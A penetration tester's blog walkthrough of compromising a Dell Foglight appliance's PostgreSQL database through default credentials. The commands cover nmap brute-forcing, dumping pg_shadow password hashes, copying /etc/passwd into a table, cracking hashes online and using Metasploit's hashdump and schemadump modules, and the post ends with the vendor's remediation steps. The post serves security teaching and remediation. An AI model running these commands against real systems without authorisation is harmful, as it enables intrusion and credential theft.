Attacking Dell Foglight Server

I was just talking to someone a little while ago about how rarely I run into Postgres on pentests.  I have however run a postgres based product called Foglight. Ok, so what is a Dell Foglight box? A while back I was on a pentest and ran into one of these.

 

Let’s see…”Dell's application performance monitoring (APM) solution, Foglight, blends business context with deep technical insight, unifying all users and data within a structured model built around transactions – leveraging our patent-pending TransactionDNA technology.

Source: http://software.dell.com/products/foglight-application-performance-monitoring/

 

Here is a quick walk-through of me attacking Dell Foglight using Nmap NSE, some Postgres syntax, Metasploit, and a free rainbow table website called CrackStation.net. It also covers the proper remediation for the attack. Yes, I basically sanitized a pentest compromise notification document and turned it into a blog post, but c’mon it’s been a really busy week and this is still good stuff.

 

Let’s get started….

 

My Attack Virtual Machine

Here is the virtual machine that I used for this:

 

https://s3.amazonaws.com/StrategicSec-VMs/Strategicsec-Ubuntu-VPN-163.zip

username: strategicsec

password: strategicsec

 

 

Nmap Syntax

Here we use nmap to show possible ways an attacker would identify a host running postgres.

 

First we scan the system with port TCP 5432 to verify the host is running PostgreSQL:

 

sudo nmap -sV -p 5432 XXX.XXX.XXX.XXX

image 0001

 

Next we execute the NSE script “pgsql-brute” against the system:

 

sudo nmap -sV -p 5432 --script pgsql-brute XXX.XXX.XXX.XXX

image 0002

 

NMap Attack Syntax Reference:

http://nmap.org/nsedoc/scripts/pgsql-brute.html

 

 

PSQL Attack Syntax

Here we use the command-line Postgress client 'psql'  to connect to the database:

 

psql -h XXX.XXX.XXX.XXX -U postgres -W postgres

image 0003

 

 

Next we list all the databases on the postgres system:

 

\l

 

 

image 0004

Next we list the usernames and MD5 hashed passwords (For the database, not the system)

 

select usename, passwd from pg_shadow;

 

image 0005

Next we select the current database:

select current_database();

image 0006

 

 

 

Next we create a temporary table called “secureninja” to store any data that we later might want to examine:

 

create table secureninja (input TEXT);

 

image 0007

 

Next we copy the /etc/passwd file into the secureninja table that we just created:

 

copy secureninja from '/etc/passwd';

 

image 0008

Next we display the /etc/passwd data that we copied into the secureninja table:

 

select input from secureninja;

image 0009

 

Next we delete the temporary table from the customer database:

 

drop table secureninja;

 

image 0010

 

Next we exit the postgres database:

 

\q

 

image 0011

 

 

Using a website like: https://crackstation.net/ we can check the hashes for each database user (vkernel, root, postgres)

 

https://crackstation.net/

 

image 0012

image 0013

 

image 0014

 

image 0015

 

Here we start to use a common hacker tool call Metasploit to attack the database:

 

cd /home/strategicsec/toolz/metasploit

sudo ./msfconsole

 

image 0016

 

Here you can see that the Metasploit Framework has loaded to its main page:

 

image 0017

 

Here we use Metasploit to actually dump the postgres database hashes:

 

use auxiliary/scanner/postgres/postgres_hashdump

set PASSWORD postgres

set RHOSTS XXX.XXX.XXX.XXX

run

 

image 0018

 

Next we use Metasploit to dump the postgres database schema:

 

use auxiliary/scanner/postgres/postgres_schemadump

set PASSWORD postgres

set RHOSTS XXX.XXX.XXX.XXX

run

 

image 0019

 

 

Here you can see that Metasploit successfully dumped the postgres database schema:

 

image 0020

 

Alright...now on to how to fix this. Before we cover how to fix it - quick shameless plug:

I’d love it if you check out the Metasploit Next Level Video Series for only $50:

http://strategicsec.com/product/metasploit-next-level-video-series/

 

Remediation

Dell provides documentation on how to fix this vulnerability.

 

How to change the default passwords for the embedded PostgreSQL database.

 

Description

 

How to change the default passwords for the embedded PostgreSQL database for the users vkernel and postgres.

 

Resolution

 

Log into the console of the virtual appliance, either directly in vSphere Client/Hyper V Manager or establish an ssh connection using a suitable application.

 

  • Log in using userid vkernel(default password vkernel)

 

  • Then become the root user using the command su - (default password password)

 

  • Issue the command /usr/local/vkernel/scripts/externalDbAccess.sh then press ENTER

 

  • Follow the prompts, as shown below:

VKernel-vOPS:~ # /usr/local/vkernel/scripts/externalDbAccess.sh
1 - Enable the embedded database access from the outside world
2 - Disable the embedded database access from the outside world
3 - Set the database users' passwords
Please select one of the above:3
Stopping VKernel collector...
Initiated collector shutdown. It will take some time for the running collection tasks to complete.
VKernel collector has been stopped
done
Stopping VKernel monitor...
VKernel monitor has been stopped
done
Stopping tomcat...
Using CATALINA_BASE: /usr/local/tomcat
Using CATALINA_HOME: /usr/local/tomcat
Using CATALINA_TMPDIR: /usr/local/tomcat/temp
Using JRE_HOME: /usr
Using CLASSPATH: /usr/local/tomcat/bin/bootstrap.jar:/usr/local/tomcat/bin/tomcat-juli.jar
Tomcat stopped
Please enter the new password for the database role postgres:
Please retype the new password:
Please enter the new password for the database role vkernel:
Please retype the new password:
Unregistering the appliance from previous database...
Unregistering the appliance from previous database is done
Migrating Hyper-V collector...
Migrating Hyper-V collector is done
Updating database multi-appliances registry...
Updating database multi-appliances registry is done
Updating VKernel configuration...
Updating VKernel configuration is done

Configuration completed
applying password for user postgres
applying password for user vkernel
Starting tomcat...
Using CATALINA_BASE: /usr/local/tomcat
Using CATALINA_HOME: /usr/local/tomcat
Using CATALINA_TMPDIR: /usr/local/tomcat/temp
Using JRE_HOME: /usr
Using CLASSPATH: /usr/local/tomcat/bin/bootstrap.jar:/usr/local/tomcat/bin/tomcat-juli.jar
Tomcat started in normal mode
Starting VKernel monitor...
VKernel vOPS Server 6.0. Build: 120918.1924. Schema: 8-11.55
VKernel monitor has been started
done
Starting VKernel collector...
VKernel vOPS Server 6.0. Build: 120918.1924. Schema: 8-11.55
VKernel collector has been started
done
VKernel-vOPS:~ #

 

 

Remediation Reference:

https://support.software.dell.com/foglight-for-virtualization-standard-edition/kb/99015

 

The following two tabs change content below.
CEO/Founder at Strategic Security "I love helping people, I love my family, I love basketball, I love teaching, and you all know that I love rum and coke."  

No Comments Yet.

Leave a comment